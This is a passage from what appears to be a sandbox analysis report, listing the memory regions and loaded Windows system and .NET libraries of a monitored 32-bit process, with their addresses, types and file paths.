start_va = 0x6d950000 end_va = 0x6d966fff monitored = 0 entry_point = 0x6d9535fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2480 start_va = 0x3a0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 2481 start_va = 0xfff50000 end_va = 0xfff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff50000" filename = "" Region: id = 2482 start_va = 0xfff40000 end_va = 0xfff4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff40000" filename = "" Region: id = 2483 start_va = 0x420000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 2484 start_va = 0x75610000 end_va = 0x75644fff monitored = 0 entry_point = 0x7561145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2485 start_va = 0x76c10000 end_va = 0x76c15fff monitored = 0 entry_point = 0x76c11782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2486 start_va = 0x744e0000 end_va = 0x7451bfff monitored = 0 entry_point = 0x744e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2487 start_va = 0x744d0000 end_va = 0x744d4fff monitored = 0 entry_point = 0x744d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 2488 start_va = 0x744c0000 end_va = 0x744c5fff monitored = 0 entry_point = 0x744c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 2489 start_va = 0x74560000 end_va = 0x745a3fff monitored = 0 entry_point = 0x745763f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 2490 start_va = 0xd90000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2491 start_va = 0xed0000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 2492 start_va = 0x74540000 end_va = 0x7455bfff monitored = 0 entry_point = 0x7454a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2493 start_va = 0x74530000 end_va = 0x74536fff monitored = 0 entry_point = 0x7453128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2494 start_va = 0x74430000 end_va = 0x74435fff monitored = 0 entry_point = 0x744314b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 2495 start_va = 0x743f0000 end_va = 0x74427fff monitored = 0 entry_point = 0x743f990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 2496 start_va = 0x4e60000 end_va = 0x4fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 2661 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2662 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2663 start_va = 0x3d0000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2664 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2665 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2666 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2667 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2668 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2669 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2670 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2671 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2672 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2673 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2674 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2675 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2676 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2677 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2678 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2679 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2680 start_va = 0x6d940000 end_va = 0x6d94cfff monitored = 0 entry_point = 0x6d942012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 2681 start_va = 0x6d920000 end_va = 0x6d931fff monitored = 0 entry_point = 0x6d923271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 2682 start_va = 0x779b0000 end_va = 0x779b4fff monitored = 0 entry_point = 0x779b1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2683 start_va = 0x74360000 end_va = 0x743b1fff monitored = 0 entry_point = 0x743614be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 2684 start_va = 0x74340000 end_va = 0x74354fff monitored = 0 entry_point = 0x743412de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 2685 start_va = 0x74330000 end_va = 0x7433cfff monitored = 0 entry_point = 0x74331326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 2692 start_va = 0xfa0000 end_va = 0x105ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2693 start_va = 0xe60000 end_va = 0xe9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2694 start_va = 0x49f0000 end_va = 0x4aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 2695 start_va = 0x4b40000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 2696 start_va = 0x6d8c0000 end_va = 0x6d917fff monitored = 0 entry_point = 0x6d8c13b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 2697 start_va = 0xfffaa000 end_va = 0xfffacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffaa000" filename = "" Region: id = 2698 start_va = 0x6d870000 end_va = 0x6d8befff monitored = 0 entry_point = 0x6d871452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 2699 start_va = 0xd90000 end_va = 0xdcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2700 start_va = 0xe20000 end_va = 0xe5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 2701 start_va = 0x4e80000 end_va = 0x4f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e80000" filename = "" Region: id = 2702 start_va = 0x4fa0000 end_va = 0x4fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fa0000" filename = "" Region: id = 2703 start_va = 0xfffa7000 end_va = 0xfffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa7000" filename = "" Region: id = 2704 start_va = 0x6d860000 end_va = 0x6d867fff monitored = 0 entry_point = 0x6d8634d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 2705 start_va = 0xa10000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 2706 start_va = 0x50e0000 end_va = 0x51dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 2707 start_va = 0xfffa4000 end_va = 0xfffa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa4000" filename = "" Region: id = 2708 start_va = 0x4fe0000 end_va = 0x50dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004fe0000" filename = "" Region: id = 2709 start_va = 0x5210000 end_va = 0x524ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005210000" filename = "" Region: id = 2710 start_va = 0x5290000 end_va = 0x538ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005290000" filename = "" Region: id = 2711 start_va = 0xfffa1000 end_va = 0xfffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fffa1000" filename = "" Region: id = 2712 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2713 start_va = 0x3c0000 end_va = 0x3c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2714 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2715 start_va = 0x3c0000 end_va = 0x3c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2716 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2717 start_va = 0x3b0000 end_va = 0x3b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2718 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2719 start_va = 0x3b0000 end_va = 0x3b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2720 start_va = 0x3b0000 end_va = 0x3b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 2721 start_va = 0x3b0000 end_va = 0x3b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 2722 start_va = 0x3b0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 2723 start_va = 0x6d850000 end_va = 0x6d857fff monitored = 0 entry_point = 0x6d8510e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 2724 start_va = 0x6d810000 end_va = 0x6d84efff monitored = 0 entry_point = 0x6d812351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 2725 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 2726 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 2727 start_va = 0x6d7d0000 end_va = 0x6d807fff monitored = 0 entry_point = 0x6d7d1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 2728 start_va = 0x6d790000 end_va = 0x6d7ccfff monitored = 0 entry_point = 0x6d7910f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2729 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 2730 start_va = 0x5490000 end_va = 0x558ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005490000" filename = "" Region: id = 2731 start_va = 0xfff3d000 end_va = 0xfff3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff3d000" filename = "" Region: id = 2732 start_va = 0x6d770000 end_va = 0x6d786fff monitored = 0 entry_point = 0x6d771c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 2733 start_va = 0x5390000 end_va = 0x548ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 2735 start_va = 0x5590000 end_va = 0x578ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005590000" filename = "" Region: id = 2736 start_va = 0x6d750000 end_va = 0x6d765fff monitored = 0 entry_point = 0x6d752061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 2737 start_va = 0x3d0000 end_va = 0x3d9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 2738 start_va = 0x6d620000 end_va = 0x6d74ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll") Region: id = 2739 start_va = 0x743e0000 end_va = 0x743edfff monitored = 0 entry_point = 0x743e1235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 2740 start_va = 0x57d0000 end_va = 0x580ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000057d0000" filename = "" Region: id = 2741 start_va = 0x58b0000 end_va = 0x59affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000058b0000" filename = "" Region: id = 2742 start_va = 0x6d5f0000 end_va = 0x6d610fff monitored = 1 entry_point = 0x6d5f98e0 region_type = mapped_file name = "wminet_utils.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\WMINet_Utils.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\wminet_utils.dll") Region: id = 2743 start_va = 0xfff3a000 end_va = 0xfff3cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff3a000" filename = "" Region: id = 2744 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2745 start_va = 0x3e0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 2746 start_va = 0x3e0000 end_va = 0x3e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2747 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2748 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 2749 start_va = 0x6d5d0000 end_va = 0x6d5e9fff monitored = 0 entry_point = 0x6d5e03d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 2750 start_va = 0x6d560000 end_va = 0x6d5c0fff monitored = 0 entry_point = 0x6d59bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\SysWOW64\\wbemcomn2.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn2.dll") Region: id = 2751 start_va = 0x6d550000 end_va = 0x6d55afff monitored = 0 entry_point = 0x6d5552a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2752 start_va = 0x6d540000 end_va = 0x6d54efff monitored = 0 entry_point = 0x6d5493d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2753 start_va = 0x6d490000 end_va = 0x6d535fff monitored = 0 entry_point = 0x6d4fa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2754 start_va = 0x6d470000 end_va = 0x6d487fff monitored = 0 entry_point = 0x6d471335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\SysWOW64\\ntdsapi.dll" (normalized: "c:\\windows\\syswow64\\ntdsapi.dll") Region: id = 2860 start_va = 0x490000 end_va = 0x492fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 2861 start_va = 0x6d2d0000 end_va = 0x6d467fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.csharp.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.CSharp\\f73f48afb5512225dedaee9c88ac5050\\Microsoft.CSharp.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.csharp\\f73f48afb5512225dedaee9c88ac5050\\microsoft.csharp.ni.dll") Region: id = 2862 start_va = 0x6d120000 end_va = 0x6d2c2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.drawing.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll") Region: id = 2863 start_va = 0x6c2b0000 end_va = 0x6d115fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.windows.forms.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll") Region: id = 2864 start_va = 0x6c120000 end_va = 0x6c2affff monitored = 0 entry_point = 0x6c1bd026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 2865 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2866 start_va = 0x74440000 end_va = 0x744bffff monitored = 0 entry_point = 0x744537c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2867 start_va = 0x59b0000 end_va = 0x5b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059b0000" filename = "" Region: id = 2868 start_va = 0x59b0000 end_va = 0x5a8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000059b0000" filename = "" Region: id = 2869 start_va = 0x5b50000 end_va = 0x5b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005b50000" filename = "" Region: id = 2870 start_va = 0xde0000 end_va = 0xe1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 2871 start_va = 0x5c70000 end_va = 0x5d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c70000" filename = "" Region: id = 2872 start_va = 0xfff37000 end_va = 0xfff39fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff37000" filename = "" Region: id = 2873 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 2874 start_va = 0x5dd0000 end_va = 0x5ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005dd0000" filename = "" Region: id = 2875 start_va = 0xfff34000 end_va = 0xfff36fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff34000" filename = "" Region: id = 2876 start_va = 0x6c0b0000 end_va = 0x6c114fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.dynamic.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dynamic\\b7ad5353ae4f44df28ce7ebc9a8a752a\\System.Dynamic.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dynamic\\b7ad5353ae4f44df28ce7ebc9a8a752a\\system.dynamic.ni.dll") Region: id = 2877 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2878 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2879 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2880 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2881 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2882 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2883 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2884 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 2885 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2886 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2887 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2888 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2889 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2890 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2891 start_va = 0x5ed0000 end_va = 0x63c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ed0000" filename = "" Region: id = 2899 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2901 start_va = 0x63d0000 end_va = 0x68c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000063d0000" filename = "" Region: id = 2902 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2903 start_va = 0x6bfb0000 end_va = 0x6c0aafff monitored = 0 entry_point = 0x6bfc17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 2911 start_va = 0x5aa0000 end_va = 0x5adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005aa0000" filename = "" Region: id = 2912 start_va = 0x69b0000 end_va = 0x6aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000069b0000" filename = "" Region: id = 2913 start_va = 0xfff31000 end_va = 0xfff33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000fff31000" filename = "" Region: id = 2960 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2961 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2963 start_va = 0x4e0000 end_va = 0x4effff monitored = 